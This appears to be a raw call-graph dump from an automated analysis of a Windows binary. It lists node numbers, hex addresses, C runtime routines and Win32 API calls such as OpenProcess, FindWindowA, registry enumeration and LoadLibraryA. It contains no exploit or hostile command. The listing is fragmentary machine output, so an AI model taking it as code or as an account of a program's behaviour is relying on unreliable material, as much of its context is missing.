__malloc_crt 66 API calls 83275->83276 83277 11178005 83276->83277 83277->83253 83278->83261 83279->83261 83280->83263 83281->83261 83282->83261 83283->83261 83284->83272 83285->83274 83287 1116581d 83286->83287 83288 11165836 83286->83288 83287->83288 83319 11171046 8 API calls 83287->83319 83290 111664d5 83288->83290 83320 111744c6 LeaveCriticalSection 83290->83320 83292 11166422 83293 11166187 83292->83293 83294 111661b0 83293->83294 83298 111661cb 83293->83298 83297 11165e4d __setlocale_set_cat 101 API calls 83294->83297 83303 111661ba 83294->83303 83295 1116631c 83321 11165c2c 83295->83321 83297->83303 83298->83295 83306 111662f5 83298->83306 83310 11166200 _strpbrk _strncmp _strcspn _strlen 83298->83310 83300 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 83302 111663a1 83300->83302 83301 11166331 _setlocale 83301->83303 83301->83306 83335 11165e4d 83301->83335 83302->83036 83302->83037 83303->83300 83306->83303 83381 11165ac7 70 API calls 6 library calls 83306->83381 83307 1116630e 83378 1116ed72 83307->83378 83309 11165e4d __setlocale_set_cat 101 API calls 83309->83310 83310->83303 83310->83306 83310->83307 83310->83309 83377 111699f9 66 API calls _sprintf 83310->83377 83311->83020 83312->83027 83313->83044 83314->83046 83315->83047 83316->83027 83317->83039 83318->83027 83319->83288 83320->83292 83322 1116c675 __getptd 66 API calls 83321->83322 83323 11165c67 83322->83323 83332 11165ccd _memmove _setlocale _strlen 83323->83332 83333 11165cd4 83323->83333 83425 1116cd5f 83323->83425 83324 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 83325 11165e4b 83324->83325 83325->83301 83328 1116ed72 __invoke_watson 10 API calls 83328->83332 83330 1116cd5f _strcpy_s 66 API calls 83330->83332 83332->83328 83332->83330 83332->83333 83382 1116593d 83332->83382 83389 11174bcc 83332->83389 83434 11165a5c 66 API calls 3 library calls 83332->83434 83435 111699f9 66 API calls _sprintf 83332->83435 83333->83324 83336 1116c675 __getptd 66 API calls 83335->83336 83337 11165e7a 83336->83337 83338 11165c2c __expandlocale 96 API calls 83337->83338 83342 11165ea2 _setlocale _strlen 83338->83342 83339 11165ea9 83340 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 83339->83340 83341 11165eb7 83340->83341 83341->83301 83342->83339 83343 1116ac39 __malloc_crt 66 API calls 83342->83343 83344 11165ef3 _memmove 83343->83344 83344->83339 83345 1116cd5f _strcpy_s 66 API calls 83344->83345 83351 11165f66 _memmove 83345->83351 83346 11166155 83347 1116ed72 __invoke_watson 10 API calls 83346->83347 83348 11166186 83347->83348 83349 111661b0 83348->83349 83356 111661cb 83348->83356 83352 111661ba 83349->83352 83355 11165e4d __setlocale_set_cat 100 API calls 83349->83355 83350 111662f5 83350->83352 83463 11165ac7 70 API calls 6 library calls 83350->83463 83351->83346 83369 1116606a _memcmp 83351->83369 83461 11174ea4 79 API calls 2 library calls 83351->83461 83360 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 83352->83360 83353 1116631c 83357 11165c2c __expandlocale 96 API calls 83353->83357 83355->83352 83356->83350 83356->83353 83373 11166200 _strpbrk _strncmp _strcspn _strlen 83356->83373 83368 11166331 _setlocale 83357->83368 83358 111660f0 83362 11163aa5 _free 66 API calls 83358->83362 83359 11166121 83359->83346 83363 1116612d InterlockedDecrement 83359->83363 83364 111663a1 83360->83364 83362->83339 83363->83346 83365 11166145 83363->83365 83364->83301 83366 11163aa5 _free 66 API calls 83365->83366 83367 1116614d 83366->83367 83370 11163aa5 _free 66 API calls 83367->83370 83368->83350 83368->83352 83371 11165e4d __setlocale_set_cat 100 API calls 83368->83371 83369->83358 83369->83359 83370->83346 83371->83368 83373->83350 83373->83352 83374 1116630e 83373->83374 83376 11165e4d __setlocale_set_cat 100 API calls 83373->83376 83462 111699f9 66 API calls _sprintf 83373->83462 83375 1116ed72 __invoke_watson 10 API calls 83374->83375 83375->83352 83376->83373 83377->83310 83464 1116ec49 83378->83464 83381->83303 83384 11165956 _memset 83382->83384 83383 11165985 _strcspn 83386 11165962 83383->83386 83387 1116ed72 __invoke_watson 10 API calls 83383->83387 83437 111699f9 66 API calls _sprintf 83383->83437 83384->83383 83384->83386 83436 111699f9 66 API calls _sprintf 83384->83436 83386->83332 83387->83383 83390 1116c675 __getptd 66 API calls 83389->83390 83394 11174bd9 83390->83394 83391 11174be6 GetUserDefaultLCID 83407 11174c6d 83391->83407 83392 11174c10 83395 11174c78 83392->83395 83397 11174c22 83392->83397 83394->83391 83394->83392 83448 1117463f 85 API calls _LangCountryEnumProc@4 83394->83448 83395->83391 83400 11174c83 _strlen 83395->83400 83399 11174c36 83397->83399 83401 11174c2d 83397->83401 83453 11174b90 EnumSystemLocalesA _GetPrimaryLen _strlen 83399->83453 83406 11174c89 EnumSystemLocalesA 83400->83406 83449 11174b29 83401->83449 83403 11174cde 83408 11174d03 IsValidCodePage 83403->83408 83415 11174dae 83403->83415 83405 11174c34 83405->83407 83454 1117463f 85 API calls _LangCountryEnumProc@4 83405->83454 83406->83407 83407->83415 83438 111746a1 83407->83438 83410 11174d15 IsValidLocale 83408->83410 83408->83415 83410->83415 83418 11174d28 83410->83418 83411 11174c54 83411->83407 83412 11174c6f 83411->83412 83413 11174c66 83411->83413 83455 11174b90 EnumSystemLocalesA _GetPrimaryLen _strlen 83412->83455 83416 11174b29 _GetLcidFromLangCountry EnumSystemLocalesA 83413->83416 83415->83332 83416->83407 83417 11174d79 GetLocaleInfoA 83417->83415 83419 11174d8a GetLocaleInfoA 83417->83419 83418->83415 83418->83417 83420 1116cd5f _strcpy_s 66 API calls 83418->83420 83419->83415 83421 11174d9e 83419->83421 83422 11174d66 83420->83422 83456 1116c308 66 API calls _xtoa_s@20 83421->83456 83422->83419 83424 1116ed72 __invoke_watson 10 API calls 83422->83424 83424->83417 83426 1116cd74 83425->83426 83427 1116cd6d 83425->83427 83458 1116a1af 66 API calls __getptd_noexit 83426->83458 83427->83426 83431 1116cd92 83427->83431 83429 1116cd79 83459 1116edc4 11 API calls _sprintf 83429->83459 83432 1116cd83 83431->83432 83460 1116a1af 66 API calls __getptd_noexit 83431->83460 83432->83332 83434->83332 83435->83332 83436->83383 83437->83383 83439 111746fb GetLocaleInfoW 83438->83439 83440 111746ab _setlocale 83438->83440 83441 11174717 83439->83441 83447 111746ea 83439->83447 83440->83439 83443 111746c1 _setlocale 83440->83443 83442 1117471d GetACP 83441->83442 83441->83447 83442->83403 83444 111746d2 GetLocaleInfoW 83443->83444 83445 111746ef 83443->83445 83444->83447 83457 11163c91 79 API calls __wcstoi64 83445->83457 83447->83403 83448->83392 83450 11174b30 _GetPrimaryLen _strlen 83449->83450 83451 11174b66 EnumSystemLocalesA 83450->83451 83452 11174b80 83451->83452 83452->83405 83453->83405 83454->83411 83455->83407 83456->83415 83457->83447 83458->83429 83459->83432 83460->83429 83461->83369 83462->83373 83463->83352 83465 1116ec68 _memset __call_reportfault 83464->83465 83466 1116ec86 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 83465->83466 83469 1116ed54 __call_reportfault 83466->83469 83467 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 83468 1116ed70 GetCurrentProcess TerminateProcess 83467->83468 83468->83303 83469->83467 83472 111436a6 83470->83472 83471 11143763 83471->83054 83472->83471 83477 11081d30 83472->83477 83474 111436cb 83475 11081d30 IsDBCSLeadByte 83474->83475 83476 111436fb _memmove 83475->83476 83476->83054 83478 11081d3c 83477->83478 83480 11081d41 std::_Mutex::_Mutex __mbschr_l 83477->83480 83481 11081c50 IsDBCSLeadByte 83478->83481 83480->83474 83481->83480 83483 11142e6a 83482->83483 83484 11142e6c 83482->83484 83483->83069 83485 11110230 std::_Mutex::_Mutex 265 API calls 83484->83485 83486 11142e92 83485->83486 83487 11142eb9 83486->83487 83489 11142e9b _strncpy 83486->83489 83494 11029a70 265 API calls 2 library calls 83487->83494 83489->83069 83495 11061970 83491->83495 83506 11061290 83495->83506 83499 110619cc 83500 11061a08 83499->83500 83504 11061320 274 API calls 83499->83504 83553 11061170 83500->83553 83504->83499 83507 111101b0 std::_Mutex::_Mutex 265 API calls 83506->83507 83508 110612ac 83507->83508 83509 110612f5 83508->83509 83510 110612b3 83508->83510 83565 1116305a 66 API calls std::exception::_Copy_str 83509->83565 83558 1105ee10 83510->83558 83513 110612eb 83517 11061320 83513->83517 83514 11061304 83566 111634b1 RaiseException 83514->83566 83516 11061319 83518 11061635 83517->83518 83522 11061355 83517->83522 83518->83499 83519 11061624 83520 1105ee10 68 API calls 83519->83520 83520->83518 83521 110614b4 83521->83519 83550 11061542 std::ios_base::_Ios_base_dtor 83521->83550 83567 110611e0 266 API calls 83521->83567 83522->83521 83524 11061401 RegEnumValueA 83522->83524 83525 11061389 RegQueryInfoKeyA 83522->83525 83526 1106149c 83524->83526 83539 11061435 83524->83539 83527 110613c2 83525->83527 83528 110613ae 83525->83528 83531 11163aa5 _free 66 API calls 83526->83531 83532 110613e2 83527->83532 83572 11029a70 265 API calls 2 library calls 83527->83572 83571 11029a70 265 API calls 2 library calls 83528->83571 83529 11081d30 IsDBCSLeadByte 83529->83539 83534 110614a9 83531->83534 83533 11163a11 _malloc 66 API calls 83532->83533 83536 110613f0 83533->83536 83534->83521 83536->83524 83537 110614e6 83537->83550 83568 11145bc0 83537->83568 83538 1106146e RegEnumValueA 83538->83526 83538->83539 83539->83529 83539->83538 83551 11061649 std::ios_base::_Ios_base_dtor 83539->83551 83573 11081e70 83539->83573 83540 110615a0 83540->83550 83585 11029a70 265 API calls 2 library calls 83540->83585 83542 11146a90 268 API calls 83542->83550 83546 11081d30 IsDBCSLeadByte 83546->83550 83550->83519 83550->83540 83550->83542 83550->83546 83550->83551 83552 11081e70 86 API calls 83550->83552 83551->83499 83552->83550 83554 1105ee10 68 API calls 83553->83554 83555 110611a3 83554->83555 83595 110608e0 83555->83595 83559 1105ee21 LeaveCriticalSection 83558->83559 83560 1105ee2b 83558->83560 83559->83560 83561 1105ee3f 83560->83561 83562 11163aa5 _free 66 API calls 83560->83562 83563 1105ee85 83561->83563 83564 1105ee49 EnterCriticalSection 83561->83564 83562->83561 83563->83513 83564->83513 83565->83514 83566->83516 83567->83537 83586 111434c0 83568->83586 83574 11081e7d 83573->83574 83575 11081e82 83573->83575 83593 11081c50 IsDBCSLeadByte 83574->83593 83577 11081e8b 83575->83577 83581 11081e9f 83575->83581 83594 1116558e 85 API calls 2 library calls 83577->83594 83579 11081e98 83579->83539 83580 11081f03 83580->83539 83581->83580 83582 11166654 85 API calls std::_Mutex::_Mutex 83581->83582 83582->83581 83587 111434d0 83586->83587 83587->83587 83588 11110230 std::_Mutex::_Mutex 265 API calls 83587->83588 83593->83575 83594->83579 83596 110608f4 83595->83596 83602 1106092c 83595->83602 83596->83602 83610->83079 83612 11124fd1 InitializeCriticalSection 83611->83612 83614 11124ffe GetCurrentThreadId 83612->83614 83616 11125035 83614->83616 83617 1112503c 83614->83617 83701 1110fff0 InterlockedIncrement 83616->83701 83659 11160b10 InterlockedIncrement 83617->83659 83657->83088 83660 11160b27 CreateCompatibleDC 83659->83660 83661 11160b22 83659->83661 83663 11160b4c SelectPalette SelectPalette 83660->83663 83664 11160b38 83660->83664 83734 11160a60 272 API calls std::_Mutex::_Mutex 83661->83734 83736 11160750 265 API calls 83663->83736 83735 11029a70 265 API calls 2 library calls 83664->83735 83667 11160b73 83737 11160750 265 API calls 83667->83737 83670 11160b80 83671 11160b93 83670->83671 83672 11160c4e 83670->83672 83738 111606e0 265 API calls 2 library calls 83671->83738 83749 11160750 265 API calls 83672->83749 83701->83617 83734->83660 83736->83667 83737->83670 84771->83138 84772->83143 84773 11116880 84791 11145ef0 84773->84791 84776 111168c5 84777 111168a8 84776->84777 84778 111168d4 CoInitialize CoCreateInstance 84776->84778 84779 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 84777->84779 84781 11116904 LoadLibraryA 84778->84781 84782 111168f9 84778->84782 84783 111168b6 84779->84783 84780 11145c70 std::_Mutex::_Mutex 90 API calls 84780->84776 84781->84782 84784 11116920 GetProcAddress 84781->84784 84785 111169e1 CoUninitialize 84782->84785 84786 111169e7 84782->84786 84787 11116930 SHGetSettings 84784->84787 84788 11116944 FreeLibrary 84784->84788 84785->84786 84789 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 84786->84789 84787->84788 84788->84782 84790 111169f6 84789->84790 84792 11145c70 std::_Mutex::_Mutex 90 API calls 84791->84792 84793 1111689e 84792->84793 84793->84776 84793->84777 84793->84780 84794 1102ebd0 84795 1102ec13 84794->84795 84796 111101b0 std::_Mutex::_Mutex 265 API calls 84795->84796 84797 1102ec1a 84796->84797 84799 1102ec3a 84797->84799 85856 11143630 84797->85856 84800 11143780 86 API calls 84799->84800 84801 1102ec64 84800->84801 84802 1102ec91 84801->84802 84803 11081e70 86 API calls 84801->84803 84805 11143780 86 API calls 84802->84805 84804 1102ec76 84803->84804 84806 11081e70 86 API calls 84804->84806 84807 1102ecba 84805->84807 84806->84802 84808 11163ca7 std::_Mutex::_Mutex 79 API calls 84807->84808 84813 1102ecc7 84807->84813 84808->84813 84809 1102ecf6 84810 1102ed68 84809->84810 84811 1102ed4f GetSystemMetrics 84809->84811 84816 1102ed82 CreateEventA 84810->84816 84811->84810 84812 1102ed5e 84811->84812 84815 11147060 std::_Mutex::_Mutex 21 API calls 84812->84815 84813->84809 84814 11145c70 std::_Mutex::_Mutex 90 API calls 84813->84814 84814->84809 84815->84810 84817 1102ed95 84816->84817 84818 1102eda9 84816->84818 85864 11029a70 265 API calls 2 library calls 84817->85864 84819 111101b0 std::_Mutex::_Mutex 265 API calls 84818->84819 84821 1102edb0 84819->84821 84822 1102edd0 84821->84822 84823 11110de0 428 API calls 84821->84823 84824 111101b0 std::_Mutex::_Mutex 265 API calls 84822->84824 84823->84822 84825 1102ede4 84824->84825 84826 11110de0 428 API calls 84825->84826 84827 1102ee04 84825->84827 84826->84827 84828 111101b0 std::_Mutex::_Mutex 265 API calls 84827->84828 84829 1102ee83 84828->84829 84830 1102eeb3 84829->84830 84831 11061aa0 301 API calls 84829->84831 84832 111101b0 std::_Mutex::_Mutex 265 API calls 84830->84832 84831->84830 84833 1102eecd 84832->84833 84834 1102eef2 FindWindowA 84833->84834 84836 11061710 293 API calls 84833->84836 84837 1102f032 84834->84837 84838 1102ef2b 84834->84838 84836->84834 84839 11061ef0 268 API calls 84837->84839 84838->84837 84841 1102ef43 GetWindowThreadProcessId 84838->84841 84840 1102f044 84839->84840 84842 11061ef0 268 API calls 84840->84842 84843 11147060 std::_Mutex::_Mutex 21 API calls 84841->84843 84844 1102f050 84842->84844 84845 1102ef60 OpenProcess 84843->84845 84846 11061ef0 268 API calls 84844->84846 84845->84837 84847 1102ef7d 84845->84847 84848 1102f05c 84846->84848 85865 11094f00 105 API calls 84847->85865 84850 1102f073 84848->84850 84851 1102f06a 84848->84851 85218 111464e0 84850->85218 85866 11028360 119 API calls 2 library calls 84851->85866 84853 1102ef9c 84856 11147060 std::_Mutex::_Mutex 21 API calls 84853->84856 84854 1102f06f 84854->84850 84858 1102efb0 84856->84858 84857 1102f082 84859 1102f086 84857->84859 85233 1102a6d0 IsJPIK 84857->85233 84860 1102efef CloseHandle FindWindowA 84858->84860 84864 11147060 std::_Mutex::_Mutex 21 API calls 84858->84864 85249 11145990 ExpandEnvironmentStringsA 84859->85249 84861 1102f022 84860->84861 84862 1102f014 GetWindowThreadProcessId 84860->84862 84865 11147060 std::_Mutex::_Mutex 21 API calls 84861->84865 84862->84861 84867 1102efc2 SendMessageA WaitForSingleObject 84864->84867 84869 1102f02f 84865->84869 84867->84860 84868 1102efe2 84867->84868 84871 11147060 std::_Mutex::_Mutex 21 API calls 84868->84871 84869->84837 84873 1102efec 84871->84873 84873->84860 84874 1102f0b5 84875 1102f177 84874->84875 85273 11063880 84874->85273 85288 11027b20 84875->85288 84882 1102f19c std::_Mutex::_Mutex 84894 1102f1b7 84882->84894 85308 1102ad70 84882->85308 85311 110287a0 84894->85311 85934 111457a0 85218->85934 85221 111457a0 std::_Mutex::_Mutex 265 API calls 85222 11146517 wsprintfA 85221->85222 85223 11143e00 std::_Mutex::_Mutex 8 API calls 85222->85223 85224 11146534 85223->85224 85225 11146560 85224->85225 85226 11143e00 std::_Mutex::_Mutex 8 API calls 85224->85226 85227 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 85225->85227 85228 11146549 85226->85228 85229 1114656c 85227->85229 85228->85225 85230 11146550 85228->85230 85229->84857 85231 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 85230->85231 85232 1114655c 85231->85232 85232->84857 85234 1102a705 85233->85234 85235 1102a7d3 85233->85235 85236 111101b0 std::_Mutex::_Mutex 265 API calls 85234->85236 85235->84859 85237 1102a70c 85236->85237 85238 1102a73b 85237->85238 85239 11061aa0 301 API calls 85237->85239 85240 11063880 330 API calls 85238->85240 85239->85238 85241 1102a759 85240->85241 85241->85235 85242 110d1930 268 API calls 85241->85242 85243 1102a765 85242->85243 85244 1102a7c7 85243->85244 85246 1102a798 85243->85246 85245 110d0a10 265 API calls 85244->85245 85245->85235 85247 110d0a10 265 API calls 85246->85247 85248 1102a7a4 85247->85248 85248->84859 85250 111459c7 85249->85250 85251 111459e4 std::_Mutex::_Mutex 85250->85251 85252 111459fe 85250->85252 85260 111459d4 85250->85260 85256 111459f5 GetModuleFileNameA 85251->85256 85253 111457a0 std::_Mutex::_Mutex 265 API calls 85252->85253 85254 11145a04 85253->85254 85258 11081e00 std::_Mutex::_Mutex IsDBCSLeadByte 85254->85258 85255 11142e60 std::_Mutex::_Mutex 265 API calls 85257 11145a58 85255->85257 85256->85254 85259 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 85257->85259 85258->85260 85261 1102f0a3 85259->85261 85260->85255 85262 11143e00 85261->85262 85263 11143e21 CreateFileA 85262->85263 85265 11143ebe FindCloseChangeNotification 85263->85265 85266 11143e9e 85263->85266 85269 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 85265->85269 85267 11143ea2 CreateFileA 85266->85267 85268 11143edb 85266->85268 85267->85265 85267->85268 85271 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 85268->85271 85270 11143ed7 85269->85270 85270->84874 85272 11143eea 85271->85272 85272->84874 85274 1105e820 79 API calls 85273->85274 85275 110638a8 85274->85275 85978 110627b0 85275->85978 85289 11061a70 274 API calls 85288->85289 85290 11027b54 85289->85290 85291 1105e820 79 API calls 85290->85291 85294 11027b69 85291->85294 85292 11027c38 85297 11027cec 85292->85297 85306 11081e70 86 API calls 85292->85306 85307 11145c70 std::_Mutex::_Mutex 90 API calls 85292->85307 86572 11061e10 268 API calls 4 library calls 85292->86572 85293 11027bbf LoadIconA 85296 11027bda GetSystemMetrics GetSystemMetrics LoadImageA 85293->85296 85305 11027bd1 85293->85305 85294->85292 85294->85293 85295 11145ef0 std::_Mutex::_Mutex 90 API calls 85294->85295 85299 11027ba2 LoadLibraryExA 85295->85299 85300 11027c13 85296->85300 85301 11027bff LoadIconA 85296->85301 85298 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 85297->85298 85304 11027cf9 85298->85304 85299->85293 85299->85301 85300->85292 85303 11027c17 GetSystemMetrics GetSystemMetrics LoadImageA 85300->85303 85301->85300 85303->85292 85304->84882 85305->85296 85306->85292 85307->85292 86573 11028c10 85308->86573 85312 11147060 std::_Mutex::_Mutex 21 API calls 85311->85312 85313 110287c6 85312->85313 85315 110287dd GetModuleFileNameA 85313->85315 85857 11143678 85856->85857 85860 1114363e 85856->85860 85858 11142e60 std::_Mutex::_Mutex 265 API calls 85857->85858 85859 11143680 85858->85859 85859->84799 85860->85857 85861 11143662 85860->85861 87981 11142ee0 267 API calls std::_Mutex::_Mutex 85861->87981 85863 11143668 85863->84799 85865->84853 85866->84854 85935 111457c2 85934->85935 85938 111457d9 std::_Mutex::_Mutex 85934->85938 85976 11029a70 265 API calls 2 library calls 85935->85976 85940 1114580c GetModuleFileNameA 85938->85940 85950 11145967 85938->85950 85939 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 85941 11145983 wsprintfA 85939->85941 85942 11081e00 std::_Mutex::_Mutex IsDBCSLeadByte 85940->85942 85941->85221 85943 11145821 85942->85943 85944 11145831 SHGetFolderPathA 85943->85944 85945 11145918 85943->85945 85946 1114585e 85944->85946 85947 1114587d SHGetFolderPathA 85944->85947 85948 11142e60 std::_Mutex::_Mutex 262 API calls 85945->85948 85946->85947 85951 11145864 85946->85951 85952 111458b2 std::_Mutex::_Mutex 85947->85952 85948->85950 85950->85939 85977 11029a70 265 API calls 2 library calls 85951->85977 85955 1102ad70 std::_Mutex::_Mutex 145 API calls 85952->85955 85956 111458c3 85955->85956 85958 11145240 85956->85958 85959 111452ca 85958->85959 85960 1114524b 85958->85960 85959->85945 85960->85959 85961 1114525b GetFileAttributesA 85960->85961 85962 11145275 85961->85962 85963 11145267 85961->85963 85964 11164bb8 __strdup 66 API calls 85962->85964 85963->85945 85965 1114527c 85964->85965 85966 11081e00 std::_Mutex::_Mutex IsDBCSLeadByte 85965->85966 85967 11145286 85966->85967 85968 11145240 std::_Mutex::_Mutex 67 API calls 85967->85968 85974 111452a3 85967->85974 85969 11145296 85968->85969 85970 111452ac 85969->85970 85971 1114529e 85969->85971 85973 11163aa5 _free 66 API calls 85970->85973 85972 11163aa5 _free 66 API calls 85971->85972 85972->85974 85975 111452b1 CreateDirectoryA 85973->85975 85974->85945 85975->85974 86099 11145a70 85978->86099 85980 1106283c 85981 110d1930 268 API calls 85980->85981 85982 11062850 85981->85982 85983 11062a37 85982->85983 86034 11062864 std::ios_base::_Ios_base_dtor 85982->86034 86108 1116535d 85982->86108 85985 1116535d _fgets 81 API calls 85983->85985 85984 110637a8 85986 110d0a10 265 API calls 85984->85986 85989 11062a51 85985->85989 86086 11062931 std::ios_base::_Ios_base_dtor 85986->86086 85988 11164c77 std::_Mutex::_Mutex 102 API calls 85988->85984 85994 11062ab7 _strpbrk 85989->85994 85995 11062a58 85989->85995 85990 110628e7 86127 11164536 85994->86127 85996 11062a9d 85995->85996 86000 11164c77 std::_Mutex::_Mutex 102 API calls 85995->86000 85999 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 86000->85996 86034->85984 86034->85988 86086->85999 86105 11145a83 std::ios_base::_Ios_base_dtor 86099->86105 86100 11145990 267 API calls 86100->86105 86101 11164ead std::_Mutex::_Mutex 143 API calls 86101->86105 86102 11145aea std::ios_base::_Ios_base_dtor 86102->85980 86103 11145aa5 GetLastError 86104 11145ab0 Sleep 86103->86104 86103->86105 86106 11164ead std::_Mutex::_Mutex 143 API calls 86104->86106 86105->86100 86105->86101 86105->86102 86105->86103 86107 11145ac2 86106->86107 86107->86102 86107->86105 86110 11165369 __close 86108->86110 86109 1116537c 86227 1116a1af 66 API calls __getptd_noexit 86109->86227 86110->86109 86113 111653ad 86110->86113 86112 11165381 86117 1116538c __close 86113->86117 86201 1116be59 86113->86201 86117->85990 86202 1116be8d EnterCriticalSection 86201->86202 86203 1116be6b 86201->86203 86203->86202 86227->86112 86572->85292 86574 11028c33 86573->86574 86592 1102927b 86573->86592 86575 11028cf0 GetModuleFileNameA 86574->86575 86585 11028c68 86574->86585 86576 11029317 86577 1102932a 86592->86576 86592->86577 87981->85863 87996 110262f0 87997 110262fe GetProcAddress 87996->87997 87998 1102630f 87996->87998 87997->87998 87999 11026328 87998->87999 88000 1102631c K32GetProcessImageFileNameA 87998->88000 88002 1102632e GetProcAddress 87999->88002 88003 1102633f 87999->88003 88000->87999 88001 11026361 88000->88001 88002->88003 88004 11026357 SetLastError 88003->88004 88005 11026346 88003->88005 88004->88001 88006 1113d980 88007 1113d989 88006->88007 88008 1113d98e 88006->88008 88010 11139ed0 88007->88010 88011 11139f12 88010->88011 88012 11139f07 GetCurrentThreadId 88010->88012 88013 11139f20 88011->88013 88144 11029950 88011->88144 88012->88011 88151 11134830 88013->88151 88019 1113a011 88024 1113a042 FindWindowA 88019->88024 88030 1113a0da 88019->88030 88020 1113a59a 88021 11162bb7 __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 5 API calls 88020->88021 88025 1113a5b2 88021->88025 88023 11139f5c IsWindow IsWindowVisible 88026 11147060 std::_Mutex::_Mutex 21 API calls 88023->88026 88027 1113a057 IsWindowVisible 88024->88027 88024->88030 88025->88008 88028 11139f87 88026->88028 88029 1113a05e 88027->88029 88027->88030 88031 1105e820 79 API calls 88028->88031 88029->88030 88037 11139a70 392 API calls 88029->88037 88032 1105e820 79 API calls 88030->88032 88043 1113a0ff 88030->88043 88035 11139fa3 IsWindowVisible 88031->88035 88058 1113a127 88032->88058 88033 1113a2b0 88036 1113a2ca 88033->88036 88040 11139a70 392 API calls 88033->88040 88034 1105e820 79 API calls 88038 1113a29f 88034->88038 88035->88019 88039 11139fb1 88035->88039 88042 1113a2e7 88036->88042 88387 1106c340 298 API calls 88036->88387 88041 1113a07f IsWindowVisible 88037->88041 88038->88033 88044 1113a2a4 88038->88044 88039->88019 88045 11139fb9 88039->88045 88040->88036 88041->88030 88046 1113a08e IsIconic 88041->88046 88388 1112ddd0 12 API calls 2 library calls 88042->88388 88043->88033 88043->88034 88386 1102d750 294 API calls std::_Mutex::_Mutex 88044->88386 88050 11147060 std::_Mutex::_Mutex 21 API calls 88045->88050 88046->88030 88051 1113a09f GetForegroundWindow 88046->88051 88056 11139fc3 GetForegroundWindow 88050->88056 88384 11132120 147 API calls 88051->88384 88052 1113a2ec 88053 1113a2f4 88052->88053 88054 1113a2fd 88052->88054 88389 11132a10 89 API calls 2 library calls 88053->88389 88061 1113a314 88054->88061 88062 1113a308 88054->88062 88055 1113a2ab 88055->88033 88064 11139fd2 EnableWindow 88056->88064 88071 11139ffe 88056->88071 88058->88043 88059 11081d30 IsDBCSLeadByte 88058->88059 88075 1113a174 88058->88075 88059->88075 88391 111326b0 299 API calls std::_Mutex::_Mutex 88061->88391 88067 1113a319 88062->88067 88390 11132780 299 API calls std::_Mutex::_Mutex 88062->88390 88063 11143e00 std::_Mutex::_Mutex 8 API calls 88068 1113a186 88063->88068 88382 11132120 147 API calls 88064->88382 88065 1113a0ae 88385 11132120 147 API calls 88065->88385 88066 1113a2fa 88066->88054 88078 1113a312 88067->88078 88079 1113a429 88067->88079 88077 1113a193 GetLastError 88068->88077 88092 1113a1a1 88068->88092 88071->88019 88073 1113a00a SetForegroundWindow 88071->88073 88073->88019 88074 1113a0b5 88082 1113a0cb EnableWindow 88074->88082 88087 1113a0c4 SetForegroundWindow 88074->88087 88075->88063 88083 11147060 std::_Mutex::_Mutex 21 API calls 88077->88083 88078->88067 88084 1113a331 88078->88084 88085 1113a3db 88078->88085 88081 11139600 295 API calls 88079->88081 88080 11139fe9 88383 11132120 147 API calls 88080->88383 88101 1113a42e 88081->88101 88082->88030 88083->88092 88084->88079 88094 111101b0 std::_Mutex::_Mutex 265 API calls 88084->88094 88085->88079 88399 1103f920 68 API calls 88085->88399 88087->88082 88088 11139ff0 EnableWindow 88088->88071 88089 1113a455 88103 1105e820 79 API calls 88089->88103 88143 1113a57a std::ios_base::_Ios_base_dtor 88089->88143 88091 1113a3ea 88400 1103f960 68 API calls 88091->88400 88092->88043 88093 1113a1f2 88092->88093 88098 11081d30 IsDBCSLeadByte 88092->88098 88096 11143e00 std::_Mutex::_Mutex 8 API calls 88093->88096 88095 1113a352 88094->88095 88099 1113a373 88095->88099 88392 11057eb0 308 API calls std::_Mutex::_Mutex 88095->88392 88100 1113a204 88096->88100 88098->88093 88393 1110fff0 InterlockedIncrement 88099->88393 88100->88043 88105 1113a20b GetLastError 88100->88105 88101->88089 88298 11142d90 88101->88298 88102 1113a3f5 88401 1103f980 68 API calls 88102->88401 88117 1113a485 88103->88117 88108 11147060 std::_Mutex::_Mutex 21 API calls 88105->88108 88108->88043 88110 1113a400 88402 1103f940 68 API calls 88110->88402 88111 1113a398 88394 1104d790 783 API calls 88111->88394 88114 1113a40b 88403 11110000 InterlockedDecrement 88114->88403 88115 1113a3a3 88395 1104ecd0 783 API calls 88115->88395 88118 1113a4cd 88117->88118 88119 1113a4aa 88117->88119 88120 1113a4d9 GetTickCount 88117->88120 88117->88143 88118->88120 88118->88143 88123 11147060 std::_Mutex::_Mutex 21 API calls 88119->88123 88124 1113a4eb 88120->88124 88120->88143 88122 1113a3d9 88122->88079 88126 1113a4b5 GetTickCount 88123->88126 88127 11143a50 145 API calls 88124->88127 88125 1113a3ae 88396 1104ed40 783 API calls 88125->88396 88126->88143 88129 1113a4f7 88127->88129 88131 11147af0 269 API calls 88129->88131 88130 1113a3b9 88397 1104d7d0 783 API calls 88130->88397 88133 1113a502 88131->88133 88135 11143a50 145 API calls 88133->88135 88134 1113a3c4 88134->88079 88398 110ec320 285 API calls 88134->88398 88137 1113a515 88135->88137 88404 110261a0 LoadLibraryA 88137->88404 88139 1113a522 88139->88139 88405 1112d6e0 GetProcAddress SetLastError 88139->88405 88141 1113a569 88142 1113a573 FreeLibrary 88141->88142 88141->88143 88142->88143 88143->88020 88406 110278b0 EnterCriticalSection 